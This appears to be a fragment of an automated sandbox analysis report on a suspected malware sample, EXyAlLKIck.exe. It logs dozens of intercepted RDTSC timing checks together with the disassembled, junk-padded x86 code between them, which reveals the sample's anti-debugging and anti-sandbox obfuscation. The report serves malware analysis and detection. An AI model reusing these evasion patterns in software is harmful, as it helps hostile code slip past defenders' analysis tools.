                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E01E3 second address: 50E01E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E01E9 second address: 50E01EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E01EF second address: 50E01F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E01F3 second address: 50E024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE5B8D9CB63h 0x00000010 xor cx, 1ADEh 0x00000015 jmp 00007FE5B8D9CB69h 0x0000001a popfd 0x0000001b jmp 00007FE5B8D9CB60h 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, dx 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E024A second address: 50E025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A750h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5120034 second address: 512009F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE5B8D9CB68h 0x00000008 adc ecx, 0FFE0068h 0x0000000e jmp 00007FE5B8D9CB5Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FE5B8D9CB66h 0x0000001d push eax 0x0000001e jmp 00007FE5B8D9CB5Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE5B8D9CB65h 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 512009F second address: 51200AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51200AF second address: 51200CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 mov dx, 27D2h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51200CD second address: 51200D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51200D3 second address: 51200EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov eax, 4FB5F8C9h 0x00000010 movzx esi, bx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, dl 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D05AD second address: 50D05C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A757h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D05C8 second address: 50D0633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a jmp 00007FE5B8D9CB60h 0x0000000f call 00007FE5B8D9CB62h 0x00000014 pushfd 0x00000015 jmp 00007FE5B8D9CB62h 0x0000001a adc ecx, 15BB5198h 0x00000020 jmp 00007FE5B8D9CB5Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FE5B8D9CB61h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D0633 second address: 50D0639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0EA0 second address: 50E0EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0EA6 second address: 50E0EB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0EB7 second address: 50E0ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8D9CB5Eh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0ED3 second address: 50E0ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0ED7 second address: 50E0EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0EDD second address: 50E0F1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A759h 0x0000000b sbb ax, 9DE6h 0x00000010 jmp 00007FE5B8F4A751h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0F1E second address: 50E0F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0F24 second address: 50E0F54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A752h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8F4A757h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0F54 second address: 50E0F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50F0162 second address: 50F017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50F017E second address: 50F0182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50F0182 second address: 50F0188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51107FE second address: 5110804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110804 second address: 5110808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110808 second address: 511085E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE5B8D9CB69h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FE5B8D9CB5Eh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE5B8D9CB5Eh 0x0000001d xor cx, 1818h 0x00000022 jmp 00007FE5B8D9CB5Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 511085E second address: 51108E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov edx, eax 0x0000000b mov ah, 34h 0x0000000d popad 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 call 00007FE5B8F4A757h 0x00000017 pushfd 0x00000018 jmp 00007FE5B8F4A758h 0x0000001d sbb si, EC08h 0x00000022 jmp 00007FE5B8F4A74Bh 0x00000027 popfd 0x00000028 pop eax 0x00000029 popad 0x0000002a mov eax, dword ptr [76FA65FCh] 0x0000002f pushad 0x00000030 call 00007FE5B8F4A751h 0x00000035 push esi 0x00000036 pop edi 0x00000037 pop esi 0x00000038 popad 0x00000039 test eax, eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FE5B8F4A74Fh 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51108E2 second address: 511090C instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pop ecx 0x00000009 popad 0x0000000a je 00007FE62ABAFBD0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB68h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 511090C second address: 5110912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110912 second address: 5110916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110916 second address: 5110936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8F4A754h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110936 second address: 511093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 511093C second address: 511095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE5B8F4A74Ah 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 511095E second address: 511098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d call 00007FE5B8D9CB64h 0x00000012 push esi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 511098C second address: 5110990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110990 second address: 51109FF instructions: 0x00000000 rdtsc 0x00000002 mov edi, 164A67DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a ror eax, cl 0x0000000c jmp 00007FE5B8D9CB65h 0x00000011 leave 0x00000012 pushad 0x00000013 mov si, 5A43h 0x00000017 pushfd 0x00000018 jmp 00007FE5B8D9CB68h 0x0000001d add eax, 4C113F08h 0x00000023 jmp 00007FE5B8D9CB5Bh 0x00000028 popfd 0x00000029 popad 0x0000002a retn 0004h 0x0000002d nop 0x0000002e mov esi, eax 0x00000030 lea eax, dword ptr [ebp-08h] 0x00000033 xor esi, dword ptr [007B2014h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push eax 0x0000003c lea eax, dword ptr [ebp-10h] 0x0000003f push eax 0x00000040 call 00007FE5BD73D54Ch 0x00000045 push FFFFFFFEh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE5B8D9CB65h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 51109FF second address: 5110AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE5B8F4A757h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FE5B8F4A759h 0x0000000f or cx, FA36h 0x00000014 jmp 00007FE5B8F4A751h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop eax 0x0000001e jmp 00007FE5B8F4A74Eh 0x00000023 ret 0x00000024 nop 0x00000025 push eax 0x00000026 call 00007FE5BD8EB1ADh 0x0000002b mov edi, edi 0x0000002d jmp 00007FE5B8F4A750h 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov bx, 40A0h 0x0000003a pushfd 0x0000003b jmp 00007FE5B8F4A759h 0x00000040 or ax, 5FA6h 0x00000045 jmp 00007FE5B8F4A751h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110AAA second address: 5110AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110AB0 second address: 5110AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 5110AB4 second address: 5110AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0011 second address: 50C0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A753h 0x0000000b jmp 00007FE5B8F4A753h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FE5B8F4A756h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE5B8F4A74Eh 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0069 second address: 50C00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7C67BCF4h 0x00000008 mov edx, 55BDB460h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FE5B8D9CB5Fh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE5B8D9CB65h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C00A2 second address: 50C0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e jmp 00007FE5B8F4A74Bh 0x00000013 call 00007FE5B8F4A758h 0x00000018 movzx ecx, dx 0x0000001b pop edx 0x0000001c popad 0x0000001d xchg eax, ecx 0x0000001e jmp 00007FE5B8F4A74Ah 0x00000023 push eax 0x00000024 jmp 00007FE5B8F4A74Bh 0x00000029 xchg eax, ecx 0x0000002a pushad 0x0000002b mov si, 6E6Bh 0x0000002f jmp 00007FE5B8F4A750h 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 jmp 00007FE5B8F4A750h 0x0000003b push eax 0x0000003c jmp 00007FE5B8F4A74Bh 0x00000041 xchg eax, ebx 0x00000042 jmp 00007FE5B8F4A756h 0x00000047 mov ebx, dword ptr [ebp+10h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007FE5B8F4A74Dh 0x00000053 add eax, 027876F6h 0x00000059 jmp 00007FE5B8F4A751h 0x0000005e popfd 0x0000005f mov ah, 5Fh 0x00000061 popad 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0169 second address: 50C017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C017E second address: 50C0182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0182 second address: 50C0186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0186 second address: 50C018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C018C second address: 50C01CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e pushfd 0x0000000f jmp 00007FE5B8D9CB5Ah 0x00000014 xor ecx, 7CDEB9A8h 0x0000001a jmp 00007FE5B8D9CB5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov cx, di 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C01CF second address: 50C01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C01D5 second address: 50C020E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FE5B8D9CB61h 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE5B8D9CB68h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C020E second address: 50C0214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0214 second address: 50C0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8D9CB5Ch 0x00000009 or al, FFFFFFC8h 0x0000000c jmp 00007FE5B8D9CB5Bh 0x00000011 popfd 0x00000012 mov dl, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 mov di, si 0x0000001c push esi 0x0000001d mov dh, 2Fh 0x0000001f pop eax 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007FE5B8D9CB5Bh 0x00000027 test esi, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FE5B8D9CB60h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0264 second address: 50C026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C026A second address: 50C0348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 call 00007FE5B8D9CB68h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FE62ABFAEE0h 0x00000014 jmp 00007FE5B8D9CB61h 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 pushad 0x00000021 pushad 0x00000022 mov esi, 414305A9h 0x00000027 jmp 00007FE5B8D9CB66h 0x0000002c popad 0x0000002d jmp 00007FE5B8D9CB62h 0x00000032 popad 0x00000033 je 00007FE62ABFAEA7h 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FE5B8D9CB5Eh 0x00000040 and esi, 7F616FD8h 0x00000046 jmp 00007FE5B8D9CB5Bh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FE5B8D9CB68h 0x00000052 or eax, 11D1BA38h 0x00000058 jmp 00007FE5B8D9CB5Bh 0x0000005d popfd 0x0000005e popad 0x0000005f mov edx, dword ptr [esi+44h] 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FE5B8D9CB65h 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0348 second address: 50C03B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FE5B8F4A74Eh 0x00000011 test edx, 61000000h 0x00000017 jmp 00007FE5B8F4A750h 0x0000001c jne 00007FE62ADA8A4Ah 0x00000022 jmp 00007FE5B8F4A750h 0x00000027 test byte ptr [esi+48h], 00000001h 0x0000002b pushad 0x0000002c pushad 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 jne 00007FE62ADA8A40h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FE5B8F4A74Ah 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C03B9 second address: 50C0408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6364h 0x00000007 pushfd 0x00000008 jmp 00007FE5B8D9CB5Dh 0x0000000d xor si, 9FA6h 0x00000012 jmp 00007FE5B8D9CB61h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test bl, 00000007h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007FE5B8D9CB69h 0x00000026 pop esi 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0408 second address: 50C040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B06BB second address: 50B06F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushfd 0x00000007 jmp 00007FE5B8D9CB5Ch 0x0000000c sub eax, 6AA96378h 0x00000012 jmp 00007FE5B8D9CB5Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push esi 0x0000001e push edi 0x0000001f pop eax 0x00000020 pop edx 0x00000021 mov di, si 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B06F4 second address: 50B0706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0706 second address: 50B070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B070C second address: 50B0710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0710 second address: 50B07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov eax, edi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop esi 0x0000000f mov dx, E650h 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007FE5B8D9CB5Fh 0x0000001c and esp, FFFFFFF8h 0x0000001f pushad 0x00000020 call 00007FE5B8D9CB5Bh 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FE5B8D9CB62h 0x0000002d push eax 0x0000002e pushad 0x0000002f movsx ebx, si 0x00000032 movzx esi, di 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FE5B8D9CB5Bh 0x0000003e or ecx, 2D6BE0BEh 0x00000044 jmp 00007FE5B8D9CB69h 0x00000049 popfd 0x0000004a mov di, cx 0x0000004d popad 0x0000004e xchg eax, esi 0x0000004f jmp 00007FE5B8D9CB5Ah 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov bh, C2h 0x0000005a popad 0x0000005b rdtsc
